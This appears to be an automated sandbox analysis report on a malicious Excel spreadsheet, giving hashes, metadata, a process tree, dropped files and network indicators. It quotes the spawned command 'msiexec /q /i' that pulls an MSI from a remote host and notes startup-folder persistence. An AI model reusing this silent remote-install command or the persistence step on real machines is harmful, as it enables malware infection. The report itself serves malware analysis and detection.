File name: | 85ac52fb1a85659b8aa0ee82a62720f55e2d3731870927ab82539bdd7c3908fa.xls |
Full analysis: | https://app.any.run/tasks/d7252dde-994f-4189-bc0d-38867ba5d921 |
Verdict: | Malicious activity |
Analysis date: | October 20, 2020, 13:30:02 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 19 18:57:00 2020, Security: 0 |
MD5: | 9E471C6C4F44270B058B9992AF69CD78 |
SHA1: | 49C13B3FB77C9CE36C7C150E479DAC073F0E164D |
SHA256: | 85AC52FB1A85659B8AA0EE82A62720F55E2D3731870927AB82539BDD7C3908FA |
SSDEEP: | 768:6Iikd4pxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAKDlxcpanRNRL91zUt8SbssLm:tOxEtjPOtioVjDGUU1qfDlaGGx+cL2Q8 |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
Author: | - |
---|---|
LastModifiedBy: | - |
Software: | Microsoft Excel |
CreateDate: | 2006:09:16 00:00:00 |
ModifyDate: | 2020:10:19 17:57:00 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | Sheet1 |
HeadingPairs: |
|
CompObjUserTypeLen: | 31 |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2124 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3780 | msiexec /q /i https://u.teknik.io/oRnzE.msi | C:\Windows\system32\msiexec.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2432 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2648 | "C:\Windows\Installer\MSI55B9.tmp" | C:\Windows\Installer\MSI55B9.tmp | msiexec.exe | |
User: admin Integrity Level: MEDIUM Version: 3, 3, 8, 1 | ||||
3668 | WSCript C:\Users\admin\AppData\Local\Temp\ZKWBRB.vbs | C:\Windows\system32\WSCript.exe | — | MSI55B9.tmp |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2124 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3D8B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2432 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF28C3808581E2C8D3.TMP | — | |
MD5:— | SHA256:— | |||
2432 | msiexec.exe | C:\Windows\Installer\MSI54DC.tmp | binary | |
MD5:96FA76278E63E2B37B5CF0E28A202D9B | SHA256:E5B7542118A5A3D78B1B2D71AB04AA1D5FEEBA6713BF65A972470E21EA3817B7 | |||
2432 | msiexec.exe | C:\Windows\Installer\MSI4F4D.tmp | executable | |
MD5:29676FC6F419DCB9F8F3E3993D9487B9 | SHA256:FFF9771EE8C1AE686A4EF1BF6B8617C46A5EE25A90B39A6DD9247B0C9F762F22 | |||
2432 | msiexec.exe | C:\Windows\Installer\MSI55B9.tmp | executable | |
MD5:8D2D6A26A039CE0EC9ACF9E110F999D4 | SHA256:98E4960BF6488AE13B1781CDDCA3D742FA57F5DC56852E843A12E12CB6019995 | |||
2648 | MSI55B9.tmp | C:\Users\admin\AppData\Local\Temp\ZKWBRB.vbs | text | |
MD5:5B7FDBA47EE29858AC70AC3351B539B9 | SHA256:0FF7AC8A5C471828FE1191C41D0BCCF66AE92236CB3224B97EF322654849B202 | |||
2648 | MSI55B9.tmp | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZKWBRB.lnk | lnk | |
MD5:1C25DF2D4526732F590600E1479D3CC8 | SHA256:D68B4A37D2A2B89C6365303195EDF712A2428D1E278CB22A19E8FEB82FEBAC92 | |||
2648 | MSI55B9.tmp | C:\Users\admin\AppData\Roaming\Windata\NDOHUP.exe | executable | |
MD5:8D2D6A26A039CE0EC9ACF9E110F999D4 | SHA256:98E4960BF6488AE13B1781CDDCA3D742FA57F5DC56852E843A12E12CB6019995 | |||
2432 | msiexec.exe | C:\Windows\Installer\2d545f.ipi | binary | |
MD5:C949EC9B5322F1B067A68255702AC653 | SHA256:8A5E8819E98E91C859776CBBE11E1072E455D7FC730CDB02E8C1EE5B8518FEF4 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2432 | msiexec.exe | 5.79.72.163:443 | u.teknik.io | LeaseWeb Netherlands B.V. | NL | malicious |
Domain | IP | Reputation |
---|---|---|
u.teknik.io |
| whitelisted |